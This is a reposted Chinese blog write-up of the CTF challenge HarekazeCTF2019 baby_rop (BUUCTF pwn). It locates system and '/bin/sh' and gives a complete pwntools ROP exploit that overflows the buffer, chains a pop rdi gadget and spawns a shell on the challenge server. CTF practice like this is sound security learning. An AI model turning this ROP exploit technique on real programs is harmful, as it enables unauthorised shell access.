其他分享
首页 > 其他分享> > [BUUCTF-pwn]——[HarekazeCTF2019]baby_rop

[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop

作者:互联网

[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop

先checksec一下,64位,开启NX保护
在这里插入图片描述
在IDA中看看,发现了system函数 和 "/bin/sh"字符串 ,找到地址
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中
在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",26570)
binsh = 0x0601048
system_addr = 0x04005E3
pop_rdi = 0x0400683
payload = 'a' * (0x10 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(system_addr)
p.sendline(payload)
p.interactive()

不知道有没有人和我一样找不到flag, 哈哈哈哈.

标签:BUUCTF,p64,system,HarekazeCTF2019,binsh,rop,pwn
来源: https://blog.csdn.net/Y_peak/article/details/113788916